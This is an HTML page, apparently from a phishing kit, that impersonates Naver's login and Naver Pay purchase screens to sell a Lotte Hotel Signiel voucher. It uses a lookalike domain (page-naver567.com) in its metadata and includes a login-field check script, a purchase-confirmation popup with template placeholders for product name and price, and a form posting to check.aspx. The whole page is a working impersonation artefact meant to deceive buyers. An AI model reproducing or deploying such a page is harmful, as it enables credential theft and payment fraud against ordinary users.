<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <title>네이버 : 로그인</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta
      name="viewport"
      content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, width=device-width"
    />
    <link href="http://www.naver.com/favicon.ico" rel="shortcut icon" />
    <meta name="description" content="숙박권 (롯데호텔 숙박권) 시그니엘" />
    <meta name="keywords" content="숙박권 (롯데호텔 숙박권) 시그니엘" />
    <meta
      property="og:title"
      id="og_title"
      content="숙박권 (롯데호텔 숙박권) 시그니엘 - 네이버 페이"
    />
    <meta
      property="og:description"
      id="og_description"
      content="숙박권 (롯데호텔 숙박권) 시그니엘"
    />
    <meta
      property="og:image"
      id="og_image"
      content="http://image.sysah.net/upfiles/lg/lg_202309190409290kt.jpg"
    />
    <meta
      property="og:url"
      id="og_url"
      content="http://www.page-naver567.com/?id=utHyEpvH5"
    />
    <script type="text/javascript">
      function checklogin() {
        if (document.getElementById('id').value == '') {
          document.getElementById('id').focus()
          return false
        }
        if (document.getElementById('pw').value == '') {
          document.getElementById('pw').focus()
          return false
        }
      }
    </script>
  </head>
  <body cz-shortcut-listen="true">
    <style type="text/css">
      /* Common */
      body,
      p,
      h1,
      h2,
      h3,
      h4,
      h5,
      h6,
      ul,
      ol,
      li,
      dl,
      dt,
      dd,
      table,
      th,
      td,
      form,
      fieldset,
      legend,
      input,
      textarea,
      button,
      select,
      figure,
      figurecaption {
        margin: 0;
        padding: 0;
      }
      body,
      input,
      textarea,
      select,
      button,
      table,
      h1,
      h2,
      h3,
      h4,
      h5,
      h6 {
        font-size: 12px;
        line-height: 18px;
        font-family: 돋움, Dotum, AppleGothic, sans-serif;
      }
      section,
      nav,
      article,
      aside,
      hgroup,
      header,
      footer {
        display: block;
      }
      body {
        font-size: 12px;
        color: #444444;
        background-color: #ffffff;
      }
      img,
      fieldset {
        border: none;
      }
      ul,
      ol {
        list-style: none;
      }
      em,
      address {
        font-style: normal;
      }
      a {
        color: #000;
        text-decoration: none;
        cursor: pointer;
      }
      table {
        border-collapse: collapse;
      }
      td,
      div {
        font-size: 12px;
        color: #444444;
      }
      hr,
      legend {
        display: none;
      }
      button {
        border: 0;
        background: none;
        cursor: pointer;
      }
      .pop_wrap {
        overflow: hidden;
      }
      .heard {
        position: relative;
        height: 34px;
        background: #00c73c;
      }
      .heard h1 {
        padding-left: 12px;
        font-size: 12px;
        color: #fff;
        line-height: 34px;
      }
      .cont.cont1 {
        padding: 50px 12px 43px 12px;
        font-size: 12px;
        color: #333;
        line-height: 18px;
        font-weight: bold;
        text-align: center;
      }
      .cont.cont1 strong {
        color: #fa540b;
      }
      .cont p {
        margin-bottom: 4px;
      }
      .foot {
        padding: 10px 0 0;
        border-top: 1px solid #d9d9d9;
        text-align: center;
      }
      .btn_type {
        display: inline-block;
        width: 48px;
        height: 26px;
        margin: 0 2px;
        border-radius: 1px;
        border: 1px solid #cacaca;
        background-color: #fefefe;
        line-height: 28px;
        font-size: 12px;
        color: #666;
        text-align: center;
        font-weight: bold;
      }
    </style>

    <form name="form1" method="post" action="check.aspx" id="form1">
      <input
        type="hidden"
        name="__VIEWSTATE"
        id="__VIEWSTATE"
        value="/wEPDwUKMTkyNTcwODA0NGRkkAjea0D4kh1lPYhrFOw6I0yTIls="
      />

      <input
        type="hidden"
        name="__VIEWSTATEGENERATOR"
        id="__VIEWSTATEGENERATOR"
        value="93CFB00A"
      />
      <div class="pop_wrap">
        <div class="heard">
          <h1>구매하기</h1>
        </div>
        <div class="content">
          <div class="cont cont1">
            <p>
              선택하신&nbsp;&nbsp;{my_goods_product_name}(1개)를
              구매하시겠습니까?
            </p>
            <p>
              구매가격:
              <strong>{my_goods_product_price}원</strong>
            </p>
          </div>
        </div>
        <div id="footer" class="foot">
          <a class="btn_type" id="btn_confirm">예</a>

          <a class="btn_type" id="btn_cancel">아니오</a>
        </div>
      </div>
    </form>
  </body>
</html>
